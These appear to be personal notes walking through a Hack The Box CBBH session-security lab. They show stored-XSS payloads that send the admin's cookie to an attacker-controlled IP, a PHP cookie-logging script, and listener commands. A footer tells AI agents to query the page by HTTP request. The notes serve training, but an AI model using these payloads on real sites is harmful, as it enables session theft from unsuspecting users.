# Session Security - Skills Assessment

You are currently participating in a bug bounty program.

* The only URL in scope is `http://minilab.htb.net`
* Attacking end-users through client-side attacks is in scope for this particular bug bounty program.
* Test account credentials:
  * Email: heavycat106
  * Password: rocknrol
* Through dirbusting, you identified the following endpoint `http://minilab.htb.net/submit-solution`

Find a way to hijack an admin's session. Once you do that, answer the two questions below.

***

vHosts needed for these questions:

`minilab.htb.net`

* Read the flag residing in the admin's public profile. Answer format: \[string]

We can see into us profile, the country input, i will be put basic xss to see if it is vulnerable -->

<figure><img src="/files/Qi2J4KPZ1A6JiaWdzS3J" alt=""><figcaption></figcaption></figure>

Then, i go to "Share" options and see my public profile -->

<figure><img src="/files/notaHWGSZHTkeV5bZYPn" alt=""><figcaption></figcaption></figure>

Nice! With it i can try to CSRF, put it into "Country" -->

```
<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://10.10.15.232:1234/index.php?c=' + document.cookie;"></video>
```

And craft a web with it -->

First I created the following `index.php`:

```
<?php
$logFile = "cookieLog.txt";
$cookie = $_REQUEST["c"];
 
$handle = fopen($logFile, "a");
fwrite($handle, $cookie . "\n\n");
fclose($handle);
 
header("Location: http://minilab.htb.net/app/");
exit;
?>

```

Then I started a php server:

```
php -S 0.0.0.0:1234
```

Now, sen the url profile share to admin -->

`http://minilab.htb.net/submit-solution?url=http://10.10.15.232:1234`

<figure><img src="/files/VatnaRw4WZ8UESjXwIc9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/rLWx3pUEJa2674jlfFnw" alt=""><figcaption></figcaption></figure>

It found... more o less... so... try with netcat -->

```
sudo nc -nlvp 666
```

```
<h1 onmouseover='document.write(`<img src="http://10.10.15.232:666?cookie=${btoa(document.cookie)}">`)'>test</h1>
```

<figure><img src="/files/Jk5s6negEP58kPtTsiv4" alt=""><figcaption></figcaption></figure>

NICE! now, send it to the admin -->

`http://minilab.htb.net/submit-solution?url=http://10.10.15.232:666`

<figure><img src="/files/M4dmSQsKgLjP9EmlZmiW" alt=""><figcaption></figcaption></figure>

`http://minilab.htb.net/submit-solution?url=http://minilab.htb.net/profile?email=julie.rogers@example.com`

<figure><img src="/files/rinlMH6tACaSzJoYSi0t" alt=""><figcaption></figcaption></figure>

IT MAKE! Okay, now knowing this i will to get up the php http server again -->

> I’ll use the previous php method to get the admin cookie but target to = `http://minilab.htb.net/submit-solution?url=http://minilab.htb.net/profile?email=julie.rogers@example.com`

<figure><img src="/files/PaSpuGpQ42JSqLziJUss" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9pXVVlCSY4PecAuRSOQs" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/JEdS6WoKaHFtingd8xq9" alt=""><figcaption></figcaption></figure>

***

* Go through the PCAP file residing in the admin's public profile and identify the flag. Answer format: FLAG{string}

Now, into the admin profile, i can see a PCAP file, i will be to download it and see with wireshark -->

<figure><img src="/files/xooo5AadAIbRRIzHozat" alt=""><figcaption></figcaption></figure>

Now search about "http"

<figure><img src="/files/YzStkzuBwWxNUDRxcFY1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/session-security/session-security-skills-assessment.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.